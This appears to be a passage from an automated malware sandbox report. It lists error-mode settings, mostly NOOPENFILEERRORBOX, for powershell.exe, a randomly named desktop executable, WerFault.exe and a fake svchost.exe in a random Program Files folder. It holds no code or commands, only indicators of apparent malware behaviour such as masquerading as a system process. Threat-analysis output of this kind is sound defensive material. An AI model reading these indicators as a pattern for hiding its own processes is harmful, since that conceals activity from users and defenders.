            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\qINcOlwRud.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
